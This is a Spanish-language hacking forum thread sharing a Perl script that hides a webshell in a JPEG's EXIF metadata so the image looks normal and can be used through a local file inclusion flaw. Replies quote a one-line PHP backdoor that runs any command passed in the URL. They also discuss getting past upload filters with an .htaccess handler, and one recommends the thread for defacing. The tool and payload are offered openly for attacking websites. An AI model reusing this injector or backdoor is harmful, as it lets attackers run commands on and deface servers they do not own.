LFI: Inyector de Webshells en imágenes

  • 5 Respuestas
  • 4185 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado LucaSthefano

  • *
  • Underc0der
  • Mensajes: 395
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

LFI: Inyector de Webshells en imágenes

  • en: Julio 17, 2011, 07:54:53 pm
Código: (perl) [Seleccionar]
####################################################
#          0verLFI v0.2 Coded by The X-C3LL        #       
####################################################
#  Se trata de una herramienta bastante sencilla   #
#  para inyectar una shell en una imagen JPEG      #
#  y que esta siga pudiendo ser visualizada        #
#  correctamente, de esta forma nadie sospecha.    #
#  Lo único que hace es meter la shell dentro      #
#  de los metadatos de la foto.                    #
####################################################
#             Gr33tz to Seth & CPH Comunity        #
####################################################
#          HTTP://0VERL0AD.BLOGSPOT.COM            #
####################################################



use Image::ExifTool;

print q(

+-----------------------------------+
   0verLFI v0.1 coded by The X-C3LL 

    Http://0verl0ad.blogspot.com 
+-----------------------------------+

);

die "[-]Usage: perl 0verLFI.pl <FILE> <IMAGE>\n" unless @ARGV == 2;

my $file = $ARGV[0];
my $jpeg = $ARGV[1];
print "[+]Image = $jpeg \n";
print "[+]Shell = $file \n";

open (HANDLE, $file);
@array = <HANDLE>;
my $string = join("\n", @array);


my $tool = Image::ExifTool->new();

$tool->ExtractInfo($jpeg);
$tool->SetNewValue("Model", $string);
$done = $tool->WriteInfo($jpeg);

Simplemente tienen que pasar la imagen a inyectar como argumento:



Como podeis comprobar, tras modificar los metadatos la imagen continúa viendose perfectamente:



Y si lo testeamos en un entorno local vulnerable veremos que funciona:




Autor: The X-C3LL
Fuente: Foro Portal Hacker
« Última modificación: Agosto 16, 2014, 10:35:24 am por Expermicid »

Desconectado KzZiIi3l

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
  • Aprendiendo y Compartiendo en Masa!
    • Ver Perfil
    • Email

Re:LFI: Inyector de Webshells en imágenes

  • en: Diciembre 06, 2011, 09:30:32 pm
Esto es lo mismo qe usar JPG-inclusion o para bypassear uploads?? osea usar Gimp ó wrjpgcom para insertar en un comentario el code PHP por ejemplo usar una misma shell como mini backdoor: <?php system($_GET['cmd']); die; ?> 

Desconectado incroyable

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:LFI: Inyector de Webshells en imágenes

  • en: Marzo 26, 2012, 12:44:55 am
te lo recomiendo .. el mejor texto para empezar con el defacing ... saludos

Desconectado backconnect

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email

Re:LFI: Inyector de Webshells en imágenes

  • en: Julio 04, 2012, 04:54:11 am
Esto es lo mismo qe usar JPG-inclusion o para bypassear uploads?? osea usar Gimp ó wrjpgcom para insertar en un comentario el code PHP por ejemplo usar una misma shell como mini backdoor: <?php system($_GET['cmd']); die; ?>

exactamente eso mismo es una jpg inclusion, para bypasear uploads no serviria porq lo ejecutaria como jpg. necesitarias un .htaccess con addhandler para que lo ejecutara en otra extension , el autor deberia de poner que sin un file include esto no sirve de nada.

Desconectado Muppet

  • *
  • Ex-Staff
  • *****
  • Mensajes: 411
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
    • Ver Perfil
    • Email

Re:LFI: Inyector de Webshells en imágenes

  • en: Julio 04, 2012, 07:32:22 pm
Es lo mismo q usar Cat Shell.txt >> Image.jpg
Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Desconectado aura16

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:LFI: Inyector de Webshells en imágenes

  • en: Julio 04, 2012, 08:03:33 pm
disculpa mi ignorancia pero como le ago para meter meta-datos a una imagen ._.
o como se usa esto?

lo yamo desde un archivo externo o meto directamente el codigo en los meta-datos?